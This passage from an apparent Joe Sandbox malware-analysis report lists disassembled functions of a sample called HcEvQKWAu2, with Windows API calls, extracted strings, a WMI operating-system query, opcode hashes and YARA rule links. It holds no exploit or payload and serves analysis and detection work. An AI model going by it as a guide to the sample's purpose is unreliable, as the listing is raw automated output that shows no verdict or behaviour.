                                          • Opcode ID: ac19eaf2f015ae3c691d7f2c5ed49f5fdaf0aadc42589f6dc3c5c3eed1bb6500
                                          • Instruction ID: 25fc99354eee5b7252e34605a449a03ae9f5945169bbfc2c90543bcb712a4bf7
                                          • Opcode Fuzzy Hash: ac19eaf2f015ae3c691d7f2c5ed49f5fdaf0aadc42589f6dc3c5c3eed1bb6500
                                          • Instruction Fuzzy Hash: FE3162F1A003059FEB20AA39DC46B56B7E9EF523A0F105419E158D7192DF75EC42EBA0
                                          Function 00F99711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 00F99736
                                          • _wcslen.LIBCMT ref: 00F997D6
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00F997E5
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00F99806
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F9982D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                          • API String ID: 1777411235-4209811716
                                          • Opcode ID: ef1c9ed8329b98b3e5a4d098c1b943759b477a8c8f899234feba5a91535514ee
                                          • Instruction ID: bd0767543499244e2984701e8a80bd8d9c07abe6ca7f0605bd190e437f50145f
                                          • Opcode Fuzzy Hash: ef1c9ed8329b98b3e5a4d098c1b943759b477a8c8f899234feba5a91535514ee
                                          • Instruction Fuzzy Hash: 0D314C7250C3017AFB25AF699C46F9B779C9F53320F15011DF401961C2EBA8EA08A7A6
                                          Function 00F9D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindow.USER32(?,00000005), ref: 00F9D6C1
                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 00F9D6ED
                                            • Part of subcall function 00F91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F8C116,00000000,.exe,?,?,00000800,?,?,?,00F98E3C), ref: 00F91FD1
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F9D709
                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00F9D720
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00F9D734
                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00F9D75D
                                          • DeleteObject.GDI32(00000000), ref: 00F9D764
                                          • GetWindow.USER32(00000000,00000002), ref: 00F9D76D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                          • String ID: STATIC
                                          • API String ID: 3820355801-1882779555
                                          • Opcode ID: e62fc998c50b8b65889e6c56f805c8f3f8300ea315273df400a96fa9ccfd94c7
                                          • Instruction ID: 849da92217bb0cd9503d9a5bd3f5d1d48cfba5f5e693a99b513715ebbf556e84
                                          • Opcode Fuzzy Hash: e62fc998c50b8b65889e6c56f805c8f3f8300ea315273df400a96fa9ccfd94c7
                                          • Instruction Fuzzy Hash: 0D113632A403547BFE216BB09C8EFAF7A5CAF40761F114120FA41AB0D1DA78CE0576B2
                                          Function 00FA96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00FA9705
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FA9711
                                          • _free.LIBCMT ref: 00FA971C
                                          • _free.LIBCMT ref: 00FA9727
                                          • _free.LIBCMT ref: 00FA9732
                                          • _free.LIBCMT ref: 00FA973D
                                          • _free.LIBCMT ref: 00FA9748
                                          • _free.LIBCMT ref: 00FA9753
                                          • _free.LIBCMT ref: 00FA975E
                                          • _free.LIBCMT ref: 00FA976C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 985fef10e6ef359aa7fb1ca3d63f6c59c5553a2ec6a1b4568d6ac0b77813f48b
                                          • Instruction ID: ff976bd3a589448d3530ba6cfa52fe740135a53bd2d3c9317deeaee722473b81
                                          • Opcode Fuzzy Hash: 985fef10e6ef359aa7fb1ca3d63f6c59c5553a2ec6a1b4568d6ac0b77813f48b
                                          • Instruction Fuzzy Hash: 9611A4B6510109AFCB01EF64CC42CD93BB5EF15390B5154A1FA088F262DEB6DA52AB84
                                          Function 00FA2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 322700389-393685449
                                          • Opcode ID: 93c86d1fe4cfb6a9a5e31298775832529bfede5ecd7ed842cb79365cd23d9e1c
                                          • Instruction ID: 53dcd8c0bcb6573d0d379516e026e993c159cacfc4704332a2329fa7fb4d081c
                                          • Opcode Fuzzy Hash: 93c86d1fe4cfb6a9a5e31298775832529bfede5ecd7ed842cb79365cd23d9e1c
                                          • Instruction Fuzzy Hash: E1B16CB1E00219EFCF25DFA8C8819AEB7B5FF06320F14415AF8156B212D739DA51EB91
                                          Function 00F86FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F86FAA
                                          • _wcslen.LIBCMT ref: 00F87013
                                          • _wcslen.LIBCMT ref: 00F87084
                                            • Part of subcall function 00F87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F87AAB
                                            • Part of subcall function 00F87A9C: GetLastError.KERNEL32 ref: 00F87AF1
                                            • Part of subcall function 00F87A9C: CloseHandle.KERNEL32(?), ref: 00F87B00
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                          • API String ID: 3122303884-3508440684
                                          • Opcode ID: 152f4b20fbd93ee0399ff5e912b83616cffb8864aee312607e965095d5728435
                                          • Instruction ID: 0e6efc94f799577c2573e5a59ad9c7d67693d55abcfd39628567d17e9ab10c44
                                          • Opcode Fuzzy Hash: 152f4b20fbd93ee0399ff5e912b83616cffb8864aee312607e965095d5728435
                                          • Instruction Fuzzy Hash: 8841F4B1D08744BAEB20F7709C86FEE776CAF05314F104455FA55A6182D778EA88AB22
                                          Function 00F9B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • EndDialog.USER32(?,00000001), ref: 00F9B610
                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F9B637
                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00F9B650
                                          • SetWindowTextW.USER32(?,?), ref: 00F9B661
                                          • GetDlgItem.USER32(?,00000065), ref: 00F9B66A
                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00F9B67E
                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00F9B694
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                          • String ID: LICENSEDLG
                                          • API String ID: 3214253823-2177901306
                                          • Opcode ID: 08828c60de86c015718c9115bc839019445bf4393bfa382855fc0307a20f5519
                                          • Instruction ID: 31cb27cdd7f50ff9f1c32b1ac4c72ee057df66c67a624d6257657278b937557c
                                          • Opcode Fuzzy Hash: 08828c60de86c015718c9115bc839019445bf4393bfa382855fc0307a20f5519
                                          • Instruction Fuzzy Hash: 2621EA3260420CBBEA115F76FD8DF3B3B6DEB46755F010059F601970A0CB56AA05F631
                                          Function 00F9FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A338C176,00000001,00000000,00000000,?,?,00F8AF6C,ROOT\CIMV2), ref: 00F9FD99
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00F8AF6C,ROOT\CIMV2), ref: 00F9FE14
                                          • SysAllocString.OLEAUT32(00000000), ref: 00F9FE1F
                                          • _com_issue_error.COMSUPP ref: 00F9FE48
                                          • _com_issue_error.COMSUPP ref: 00F9FE52
                                          • GetLastError.KERNEL32(80070057,A338C176,00000001,00000000,00000000,?,?,00F8AF6C,ROOT\CIMV2), ref: 00F9FE57
                                          • _com_issue_error.COMSUPP ref: 00F9FE6A
                                          • GetLastError.KERNEL32(00000000,?,?,00F8AF6C,ROOT\CIMV2), ref: 00F9FE80
                                          • _com_issue_error.COMSUPP ref: 00F9FE93
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                          • String ID:
                                          • API String ID: 1353541977-0
                                          • Opcode ID: 30a1990c4fe5e1b25b4f7845a825c72b74ad835f65703bd76519158eecf38e85
                                          • Instruction ID: 6f94c46123f9ee7e2952fb6144968491e3b0a5707bb03c7688913f93dc5f2749
                                          • Opcode Fuzzy Hash: 30a1990c4fe5e1b25b4f7845a825c72b74ad835f65703bd76519158eecf38e85
                                          • Instruction Fuzzy Hash: 5F41EEB1E00219ABEF10AF69CC45BAFB7A8EF44720F14423AF515D7251D7349904EBE5
                                          Function 00F8AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                          • API String ID: 3519838083-3505469590
                                          • Opcode ID: 06e430daad7e16ec787675f46fcab9917d6c4d20a039ba963b6596b4569a3d25
                                          • Instruction ID: b895b6b5fbc2f2ae6809a5dde8ae9729f7c63f517fdfd88e2410f13239817b3d
                                          • Opcode Fuzzy Hash: 06e430daad7e16ec787675f46fcab9917d6c4d20a039ba963b6596b4569a3d25
                                          • Instruction Fuzzy Hash: 76717D71A00219EFEF14EFA5CC959AEB7B8FF49310B00015DE512A72A0CB34AD01EF61
                                          Function 00F89382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F89387
                                          • GetLongPathNameW.KERNEL32 ref: 00F893AA
                                          • GetShortPathNameW.KERNEL32(?,?,00000800,?,00000001,?,00F88031,?,?,?,00000800,?,?,?,?,00000001), ref: 00F893C9
                                            • Part of subcall function 00F8C29A: _wcslen.LIBCMT ref: 00F8C2A2
                                            • Part of subcall function 00F91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F8C116,00000000,.exe,?,?,00000800,?,?,?,00F98E3C), ref: 00F91FD1
                                          • _swprintf.LIBCMT ref: 00F89465
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • MoveFileW.KERNEL32 ref: 00F894D4
                                          • MoveFileW.KERNEL32 ref: 00F89514
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                          • String ID: rtmp%d
                                          • API String ID: 3726343395-3303766350
                                          • Opcode ID: 8a7d217450ee3c48b68300d4eb537bd8a26a3249be136b4c6f34d48492104486
                                          • Instruction ID: 52fb0080be7e22b1eca6e6e8382722b2d794fdda62b45cfd3063e142db64a9ac
                                          • Opcode Fuzzy Hash: 8a7d217450ee3c48b68300d4eb537bd8a26a3249be136b4c6f34d48492104486
                                          • Instruction Fuzzy Hash: 2F4147B190425965DF21FB60CC45EEE737CAF45340F0848A5B649E7051DB7C9B89AFA0
                                          Function 00F91218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __aulldiv.LIBCMT ref: 00F9122E
                                            • Part of subcall function 00F8B146: GetVersionExW.KERNEL32(?), ref: 00F8B16B
                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00F91251
                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00F91263
                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00F91274
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F91284
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F91294
                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00F912CF
                                          • __aullrem.LIBCMT ref: 00F91379
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                          • String ID:
                                          • API String ID: 1247370737-0
                                          • Opcode ID: b566b9cff1d8511d68bd2065d9199876d57d5340cadc597a888c5d38ea123a51
                                          • Instruction ID: c381c2382c42a005e7699387eb4dda509e921f5b35d39159a29ff6bef7dd1080
                                          • Opcode Fuzzy Hash: b566b9cff1d8511d68bd2065d9199876d57d5340cadc597a888c5d38ea123a51
                                          • Instruction Fuzzy Hash: AE4108B19483069FD710DF65C88496BBBF9FF88314F008A2EF596C2210E739E549DB51
                                          Function 00F82210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                          Download Yara Rule
                                          APIs
                                          • _swprintf.LIBCMT ref: 00F82536
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                            • Part of subcall function 00F905DA: _wcslen.LIBCMT ref: 00F905E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                          • String ID: ;%u$x%u$xc%u
                                          • API String ID: 3053425827-2277559157
                                          • Opcode ID: 71b0bcb9ff104def7f56361543cd812288733130c1ab3f266d4595346f12cf06
                                          • Instruction ID: 64e2fc2093b3f7e47f069b2c8c73b78642f8758823aa0498bcea93ecf598dcc6
                                          • Opcode Fuzzy Hash: 71b0bcb9ff104def7f56361543cd812288733130c1ab3f266d4595346f12cf06
                                          • Instruction Fuzzy Hash: 6AF12771A043809BDF65FB248C95BFE77956F91300F08056DEC869B283CB78A945E7A2
                                          Function 00F99CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: </p>$</style>$<br>$<style>$>
                                          • API String ID: 176396367-3568243669
                                          • Opcode ID: 78bcaefa6d23847c6f26575e768215858ea3d46e1bf9d9987797e6807042f7a2
                                          • Instruction ID: f9fab7e36f8d3873cc2ef1f75e27f09bd154d85f8c93b2617e0d9a0c34be96c1
                                          • Opcode Fuzzy Hash: 78bcaefa6d23847c6f26575e768215858ea3d46e1bf9d9987797e6807042f7a2
                                          • Instruction Fuzzy Hash: C851D456E4932295FF30AA1D985177673A1DFA1760F5A042FF9C18B2C0FBE58C81A261
                                          Function 00FAF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00FAFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00FAF6CF
                                          • __fassign.LIBCMT ref: 00FAF74A
                                          • __fassign.LIBCMT ref: 00FAF765
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00FAF78B
                                          • WriteFile.KERNEL32(?,00000000,00000000,00FAFE02,00000000,?,?,?,?,?,?,?,?,?,00FAFE02,00000000), ref: 00FAF7AA
                                          • WriteFile.KERNEL32(?,00000000,00000001,00FAFE02,00000000,?,?,?,?,?,?,?,?,?,00FAFE02,00000000), ref: 00FAF7E3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: 0211a74d6608d7ce2e1877eeb803e017ef76043788c63a69e1e68466a6b69317
                                          • Instruction ID: ee9f0ee903439efbf845d40e268e674bd3d17b806d43a017fdaeb8a732bfebdf
                                          • Opcode Fuzzy Hash: 0211a74d6608d7ce2e1877eeb803e017ef76043788c63a69e1e68466a6b69317
                                          • Instruction Fuzzy Hash: 0651B6F1D002499FDB10CFA8DC85AEEBBF8EF09310F14416AE555EB251D774AA44DBA0
                                          Function 00FA2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00FA2937
